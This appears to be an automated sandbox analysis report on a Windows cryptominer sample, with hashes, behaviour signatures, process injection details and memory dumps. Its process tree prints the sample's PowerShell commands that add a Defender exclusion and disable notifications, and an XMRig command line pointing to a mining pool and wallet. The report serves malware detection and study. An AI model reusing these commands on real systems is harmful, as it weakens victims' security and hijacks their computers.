Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
20-10-2021 06:26
Static task
static1
Behavioral task
behavioral1
Sample
a024795c1658919d6d486d5b5ec3cf3d.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
a024795c1658919d6d486d5b5ec3cf3d.exe
Resource
win10-en-20210920
General
-
Target
a024795c1658919d6d486d5b5ec3cf3d.exe
-
Size
79KB
-
MD5
a024795c1658919d6d486d5b5ec3cf3d
-
SHA1
43252185f8b73d64cd398010bca860ec1ac94b52
-
SHA256
6c37eeda0f1f8b8a33b982e32864e819a2f493fba1615cbca2724264de8ca340
-
SHA512
4dc88c03e5f382189c1e05ecf2361a6606c21a3ab3ce4397b2c8cd272899bdb0d7a8a638dc64a681b36d39ec819dfaf405c0d1bc64622684673eaa3f11fee0ae
Malware Config
Signatures
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/6348-227-0x00000000004014F0-mapping.dmp xmrig behavioral2/memory/6348-232-0x0000000000400000-0x0000000000E3A000-memory.dmp xmrig -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
a024795c1658919d6d486d5b5ec3cf3d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Network Realtime Inspection Service = "C:\\ProgramData\\Microsoft Network Realtime Inspection Service\\Microsoft Network Realtime Inspection Service.exe" a024795c1658919d6d486d5b5ec3cf3d.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
a024795c1658919d6d486d5b5ec3cf3d.exeInstallUtil.exedescription pid process target process PID 1676 set thread context of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 2988 set thread context of 6348 2988 InstallUtil.exe ngen.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exea024795c1658919d6d486d5b5ec3cf3d.exeInstallUtil.exepid process 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 1096 powershell.exe 1096 powershell.exe 1096 powershell.exe 1676 a024795c1658919d6d486d5b5ec3cf3d.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe 2988 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exepowershell.exepowershell.exea024795c1658919d6d486d5b5ec3cf3d.exeInstallUtil.exengen.exedescription pid process Token: SeDebugPrivilege 2684 powershell.exe Token: SeIncreaseQuotaPrivilege 2684 powershell.exe Token: SeSecurityPrivilege 2684 powershell.exe Token: SeTakeOwnershipPrivilege 2684 powershell.exe Token: SeLoadDriverPrivilege 2684 powershell.exe Token: SeSystemProfilePrivilege 2684 powershell.exe Token: SeSystemtimePrivilege 2684 powershell.exe Token: SeProfSingleProcessPrivilege 2684 powershell.exe Token: SeIncBasePriorityPrivilege 2684 powershell.exe Token: SeCreatePagefilePrivilege 2684 powershell.exe Token: SeBackupPrivilege 2684 powershell.exe Token: SeRestorePrivilege 2684 powershell.exe Token: SeShutdownPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeSystemEnvironmentPrivilege 2684 powershell.exe Token: SeRemoteShutdownPrivilege 2684 powershell.exe Token: SeUndockPrivilege 2684 powershell.exe Token: SeManageVolumePrivilege 2684 powershell.exe Token: 33 2684 powershell.exe Token: 34 2684 powershell.exe Token: 35 2684 powershell.exe Token: 36 2684 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeIncreaseQuotaPrivilege 2844 powershell.exe Token: SeSecurityPrivilege 2844 powershell.exe Token: SeTakeOwnershipPrivilege 2844 powershell.exe Token: SeLoadDriverPrivilege 2844 powershell.exe Token: SeSystemProfilePrivilege 2844 powershell.exe Token: SeSystemtimePrivilege 2844 powershell.exe Token: SeProfSingleProcessPrivilege 2844 powershell.exe Token: SeIncBasePriorityPrivilege 2844 powershell.exe Token: SeCreatePagefilePrivilege 2844 powershell.exe Token: SeBackupPrivilege 2844 powershell.exe Token: SeRestorePrivilege 2844 powershell.exe Token: SeShutdownPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeSystemEnvironmentPrivilege 2844 powershell.exe Token: SeRemoteShutdownPrivilege 2844 powershell.exe Token: SeUndockPrivilege 2844 powershell.exe Token: SeManageVolumePrivilege 2844 powershell.exe Token: 33 2844 powershell.exe Token: 34 2844 powershell.exe Token: 35 2844 powershell.exe Token: 36 2844 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 1676 a024795c1658919d6d486d5b5ec3cf3d.exe Token: SeDebugPrivilege 2988 InstallUtil.exe Token: SeLockMemoryPrivilege 6348 ngen.exe Token: SeLockMemoryPrivilege 6348 ngen.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
ngen.exepid process 6348 ngen.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
a024795c1658919d6d486d5b5ec3cf3d.exeInstallUtil.exedescription pid process target process PID 1676 wrote to memory of 2684 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 2684 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 2844 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 2844 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 1096 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 1096 1676 a024795c1658919d6d486d5b5ec3cf3d.exe powershell.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 1676 wrote to memory of 2988 1676 a024795c1658919d6d486d5b5ec3cf3d.exe InstallUtil.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe PID 2988 wrote to memory of 6348 2988 InstallUtil.exe ngen.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a024795c1658919d6d486d5b5ec3cf3d.exe"C:\Users\Admin\AppData\Local\Temp\a024795c1658919d6d486d5b5ec3cf3d.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath C:\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Set-MpPreference -PUAProtection 12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' -Name DisableNotifications -Value 12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --algo rx/0 --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 49ZMf9zqpebBFbM1oeZChGHGhcuvZReqAiy1n9fq4FcbJeYv3FbGYwfUqsTM7p3CYCN7grTf3PYeYJh5y6YGpK879aJ5Xw8.INTELRIG11 Private-LIMON3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
dd4efe388365155cf1ce304118643efe
SHA1c1eaf27888cbfbf6b38224e81a7e16bc601b4673
SHA256258651dcc6c61e5de5adfcc06e8064aa647dff6f192aaadde432a07023a82f46
SHA512eadb32e720d7fd4e81f22f4d6d0997104b8e0539af9952d1269ae9c89ff3ae0a481b00190c895f37f89909d984e72b5c7e232ee183db8ddcd535ceaffb0d479b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
1d3a0e2432d55954eb514220ad9a8ee6
SHA1c122c6175c02df913ec265749eb38840437f7ecc
SHA25610ba0ec37dee931ea987962d0ef3b6f54406a9c95aa8b780327d9e1345af8235
SHA512ed5849d09ec2e7bee688a0ae2cd724c2973e4d6d53b9483d094988eed10afb2afadc0e3e8dccf030299abe4164eefb4052858cfa8bc5824406877615e2b5fdcf
-
memory/1096-218-0x00000221427D8000-0x00000221427D9000-memory.dmpFilesize
4KB
-
memory/1096-217-0x00000221427D6000-0x00000221427D8000-memory.dmpFilesize
8KB
-
memory/1096-204-0x00000221427D3000-0x00000221427D5000-memory.dmpFilesize
8KB
-
memory/1096-203-0x00000221427D0000-0x00000221427D2000-memory.dmpFilesize
8KB
-
memory/1096-194-0x0000000000000000-mapping.dmp
-
memory/1676-115-0x00000000009A0000-0x00000000009A1000-memory.dmpFilesize
4KB
-
memory/1676-220-0x000000001C4A0000-0x000000001C4A2000-memory.dmpFilesize
8KB
-
memory/2684-127-0x0000022A73E70000-0x0000022A73E71000-memory.dmpFilesize
4KB
-
memory/2684-119-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-128-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-130-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-131-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-149-0x0000022A5B736000-0x0000022A5B738000-memory.dmpFilesize
8KB
-
memory/2684-154-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-117-0x0000000000000000-mapping.dmp
-
memory/2684-118-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-126-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-125-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-120-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-121-0x0000022A59C70000-0x0000022A59C72000-memory.dmpFilesize
8KB
-
memory/2684-123-0x0000022A5B730000-0x0000022A5B732000-memory.dmpFilesize
8KB
-
memory/2684-122-0x0000022A5B6F0000-0x0000022A5B6F1000-memory.dmpFilesize
4KB
-
memory/2684-124-0x0000022A5B733000-0x0000022A5B735000-memory.dmpFilesize
8KB
-
memory/2684-169-0x0000022A5B738000-0x0000022A5B739000-memory.dmpFilesize
4KB
-
memory/2844-159-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-157-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-171-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-172-0x00000228782D0000-0x000002287841A000-memory.dmpFilesize
1.3MB
-
memory/2844-170-0x00000228782D0000-0x000002287841A000-memory.dmpFilesize
1.3MB
-
memory/2844-174-0x00000228782D0000-0x000002287841A000-memory.dmpFilesize
1.3MB
-
memory/2844-164-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-168-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-201-0x00000228782D0000-0x000002287841A000-memory.dmpFilesize
1.3MB
-
memory/2844-160-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-163-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-158-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2844-155-0x0000000000000000-mapping.dmp
-
memory/2844-166-0x0000022878160000-0x0000022878162000-memory.dmpFilesize
8KB
-
memory/2988-221-0x0000000140000000-mapping.dmp
-
memory/2988-224-0x0000024F67B10000-0x0000024F67B12000-memory.dmpFilesize
8KB
-
memory/6348-227-0x00000000004014F0-mapping.dmp
-
memory/6348-232-0x0000000000400000-0x0000000000E3A000-memory.dmpFilesize
10.2MB
-
memory/6348-234-0x00000178808E0000-0x0000017880900000-memory.dmpFilesize
128KB
-
memory/6348-235-0x00000178821C0000-0x00000178821E0000-memory.dmpFilesize
128KB